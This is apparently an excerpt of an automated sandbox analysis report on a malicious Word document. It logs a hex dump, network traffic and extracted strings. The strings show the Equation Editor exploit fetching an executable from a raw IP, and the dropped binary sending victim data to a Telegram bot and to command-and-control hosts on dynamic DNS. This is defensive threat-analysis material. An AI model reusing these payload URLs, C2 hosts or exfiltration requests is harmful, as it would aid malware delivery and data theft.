05 00 68 5e 00 00 ac 36 00 00 03 00 00 00 44 00 00 06 14 95 00 00 98 2a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 04 00 5d 00 00 00 01 00 00 11 00 1b 8d 37 00 00 01 25 16 72 01 00 00 70 a2 25 17 02 a2 25 18 72 0f 00 00 70 a2 25 19 03 a2 25 1a 72 13 00 00 70 a2 28 16 00 00 0a 28 17 00 00 0a 0a 00 73 18 00 00 0a 0b 07 06 04 8c 01 00 00 1b 6f 19 00 00 0a 00 06 6f 1a 00 00 0a 00 00 de 0b 06 2c 07 06 6f 1b 00 00 0a 00 dc 2a 00 00 00 01 10 00 00 02 00 32 00 1f 51 00 0b 00 00 00 00 1b 30 04 00 61 00 00 00 02 00 00 11 00 1b 8d 37 00 00 01 25 16 72 01 00 00 70 a2 25 17 02 a2 25 18 72 0f 00 00 70 a2 25 19 03 a2 25 1a 72 13 00 00 70 a2 28 16 00 00 0a 28 1c 00 00 0a 0b 00 73 18 00 00 0a 0c 08 07 6f 1d 00 00 0a a5 01 00 00 1b 0a 07 6f 1a 00 00 0a 00 00 de 0b 07 2c 07 07 6f 1b 00 00 0a 00 dc 06 0d 2b 00 09 2a 00 00 00 01 10 00 00 02 00 32 00 1e 50 00 0b 00 00 00 00 1b 30 03 00 42 00 00 00 03 00 00 11 00 72 1d 00 00 70 02 72 41 00 00 70 28 1e 00 00 0a 28 17 00 00 0a 0a 00 73 1f 00 00 0a 0b 07 06 03 8c 01 00 00 1b 6f 20 00 00 0a 00 06 6f 1a 00 00 0a 00 00 de
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2011/20/2024%20/%201:09:14%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewASN Name: SHARCOM-ASBG SHARCOM-ASBG
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49165 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49162 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficHTTP traffic detected: GET /txt/Xkl0PnD8zFPjfh1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.39Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A0F671BC-384D-4C76-B9D0-6C0270962DCC}.tmpJump to behavior
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2011/20/2024%20/%201:09:14%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /txt/Xkl0PnD8zFPjfh1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.39Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 19 Nov 2024 17:08:24 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: EQNEDT32.EXE, 00000002.00000002.360779526.000000000064F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.360779526.000000000067D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exe
                Source: EQNEDT32.EXE, 00000002.00000003.360572542.000000000067B000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.360779526.000000000067D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exeC:
                Source: EQNEDT32.EXE, 00000002.00000002.360779526.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exej
                Source: EQNEDT32.EXE, 00000002.00000002.360779526.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exettC:
                Source: wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002529000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000259E000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002590000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002496000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000257D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002546000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002554000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002536000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002483000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002529000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000259E000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002590000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002496000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000257D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002562000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000024D5000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002546000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002554000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002536000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875720695.000000000053C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: wealthcharliebgk.exe, 00000008.00000002.877493043.0000000005B14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: wealthcharliebgk.exe, 00000008.00000002.877493043.0000000005B14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002529000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000259E000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002590000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000257D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002546000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002554000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002536000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000024AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: wealthcharliebgk.exe, 00000005.00000002.371713149.0000000002465000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20a
